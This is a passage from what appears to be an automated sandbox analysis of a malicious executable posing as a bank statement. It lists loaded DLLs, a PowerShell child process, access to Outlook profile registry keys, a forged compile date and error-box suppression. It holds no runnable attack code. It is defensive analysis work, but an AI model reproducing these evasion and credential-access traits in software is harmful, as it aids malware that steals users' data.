                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: Image base 0x140000000 > 0x60000000
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic file information: File size 1270784 > 1048576
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x135c00
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: Gcz.pdb source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: Binary string: Gcz.pdbSHA256KA source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
                Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeStatic PE information: 0xEC61F726 [Fri Sep 2 23:07:18 2095 UTC]
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 0_2_00007FF848CD1325 push esp; retf C45Fh0_2_00007FF848CD44CF
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 0_2_00007FF848CD1325 push ebx; retf C45Fh0_2_00007FF848CD461E
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 0_2_00007FF848CD2248 push cs; iretd 0_2_00007FF848CD224F
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 0_2_00007FF848CDCF5A push edx; ret 0_2_00007FF848CDCF5B
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CE0D28 push es; ret 5_2_00007FF848CE0D27
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CE0CDC push es; ret 5_2_00007FF848CE0D27
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CE0C90 push edx; ret 5_2_00007FF848CE0CDB
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CEDC47 pushad ; iretd 5_2_00007FF848CEDC4E
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CEC41C push 00000076h; iretd 5_2_00007FF848CEC424
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeCode function: 5_2_00007FF848CEE63D push esi; iretd 5_2_00007FF848CEE63F

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
